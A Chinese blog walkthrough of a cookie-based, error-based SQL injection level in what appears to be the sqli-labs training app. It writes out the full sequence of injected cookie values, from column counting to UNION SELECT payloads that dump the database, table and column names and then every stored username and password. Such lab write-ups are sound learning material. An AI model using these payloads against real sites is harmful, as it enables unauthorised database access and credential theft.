zoukankan      html  css  js  c++  java
  • Less(20)POST

    1.单引号,报错型,cookie型注入。

      (1)登录后页面显示:

         

      (2)查看一下php文件

        

         可以看到查询语句查询cookee,那我们就在cookies里面进行注入

      (3)抓包看一下:

        

         看到cookie:uname=admin ,就可以以cookie注入了

      (4)加单引号发现:

        

         爆出语法错误,看得出来就是单引号型;

      (5)接下来查一下行数

        Cookie:uname=admin' order by 3 --+ //正常

        

       Cookie:uname=admin' order by 4 --+  //不正常

               

     2.爆破

      (1)爆库:Cookie:uname=-admin' union select 1,2,database() --+

        

       (2)爆表:Cookie:uname=-admin' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="security"  --+

        

      (3)爆列名:Cookie:uname=-admin' union select 1,2,group_concat(column_name)from information_schema.columns where table_name="users"   --+

        

       (4)爆值:Cookie:uname=-admin' union select 1,2,group_concat(username,0x7e,password)from security.users    --+

         

         

  • 相关阅读:
    微信开发之注册公众号(二)
    我开通个人博客了~~~~
    微信开发之启用开发者模式(三)
    float浮动属性
    数组的定义与特点
    块级元素和行内元素
    对于if判断和switch选择的入门理解
    Form表单
    不知名的作业
    自我介绍
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12304945.html
Copyright © 2011-2022 走看看